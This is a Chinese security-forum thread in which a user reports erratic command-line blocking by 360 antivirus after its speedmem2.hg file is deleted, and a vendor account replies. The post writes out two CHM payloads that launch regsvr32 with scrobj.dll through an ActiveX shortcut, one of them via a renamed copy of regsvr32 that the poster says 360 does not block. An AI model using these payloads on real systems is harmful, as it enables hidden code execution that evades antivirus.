查看: 2199|回复: 1
收起左侧

[讨论] speedmem2.hg和命令行拦截的关系太错乱了。

[复制链接]
kfne12
头像被屏蔽
发表于 2018-4-26 18:41:09 | 显示全部楼层 |阅读模式
https://bbs.kafan.cn/thread-2121300-1-1.html
承接这个帖子,发现删了speedmem2.hg就能恢复正常拦截了。

于是进一步试验,发现speedmem2.hg和各种命令行拦截之间的关系错乱的一塌糊涂。。。。

---------------------------------------------------------------
我们这样测试:
  1. <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  2. <PARAM name="Command" value="ShortCut">
  3. <PARAM name="Button" value="Bitmap::shortcut">
  4. <PARAM name="Item1" value=",regsvr32.exe,/u /n /s /i:1.txt scrobj.dll ,">
  5. <PARAM name="Item2" value="273,1,1">
  6. </OBJECT>
  7. <SCRIPT>
  8. x.Click();
  9. </SCRIPT>
复制代码
把上面这个编译成regsvr32.chm

  1. <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  2. <PARAM name="Command" value="ShortCut">
  3. <PARAM name="Button" value="Bitmap::shortcut">
  4. <PARAM name="Item1" value=',cmd.exe,/c copy j:\windows\system32\regsvr32.exe d:\test.exe'>
  5. <PARAM name="Item2" value="273,1,1">
  6. </OBJECT>
  7. <OBJECT id=y classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  8. <PARAM name="Command" value="ShortCut">
  9. <PARAM name="Button" value="Bitmap::shortcut">
  10. <PARAM name="Item1" value=",d:\test.exe,/u /n /s /i:1.txt scrobj.dll ,">
  11. <PARAM name="Item2" value="273,1,1">
  12. </OBJECT>
  13. <script type="text/javascript">
  14. x.Click();
  15. setTimeout("y.Click()",3000);
  16. </SCRIPT>
复制代码


把上面这个编译成cmd_regsvr32.chm(注意J:\windows是我个人的windows目录,你要改成你的C盘再编译,不然没法运行)。

接下来,先关闭360的zhudongfangyu服务。然后:
1.用pchunter结束360的所有进程,强制删除speedmem2.hg,重启360,运行regsvr32.chm,会发现360正常拦截。
2.用pchunter结束360的所有进程,强制删除speedmem2.hg,重启360,运行cmd_regsvr32.chm,会发现360不拦截。第一步启动cmd.exe和第二步启动test.exe,这两步都不拦截。
3.用pchunter结束360的所有进程,强制删除speedmem2.hg,重启360,运行regsvr32.chm,360拦截,点阻止,再运行cmd_regsvr32.chm,360又会拦截了。第一步启动cmd.exe和第二步启动test.exe都会拦截(拦截第二步的前提是D:\test.exe已经存在)
4.用pchunter结束360的所有进程,强制删除speedmem2.hg,重启360,开始菜单搜索里输入cmd.exe,打开cmd.exe,在cmd里面输入
explorer 1.exe,回车,360拦截“利用explorer入侵电脑”,点阻止,再运行regsvr32.chm,360拦截,点阻止,再运行cmd_regsvr32.chm,360第一步已经不拦截了,只拦截的是第二步。
-------------------------------------------------------------------------
大致就是上述这四种情况。这关系够乱吧。

如果speedmem2.hg是为了优化性能,那么我完全理解这个做法。只是优化个性能,也不至于把事情搞这么复杂吧?不知道各位怎么看?


PS:本帖不讨论绕过方法,我对cmd_regsvr32.chm是否绕过了360正常情况下的拦截并不关心,希望大家别回复讨论这个。



360主动防御
发表于 2018-4-26 19:15:30 | 显示全部楼层
我们先看看叔说的这块能不能优化一下
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 08:49 , Processed in 0.140026 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表